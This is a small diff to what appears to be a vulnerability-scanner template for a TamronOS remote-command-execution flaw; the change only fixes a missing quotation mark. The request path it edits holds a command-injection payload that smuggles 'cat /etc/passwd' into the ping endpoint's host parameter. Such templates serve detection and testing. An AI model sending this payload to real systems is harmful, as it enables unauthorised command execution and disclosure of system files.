--- a/vulnerabilities/other/tamronos-rce.yaml
+++ b/vulnerabilities/other/tamronos-rce.yaml
@@ -10,7 +10,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp
+      - "{{BaseURL}}/api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp"
 
     matchers-condition: and
     matchers:
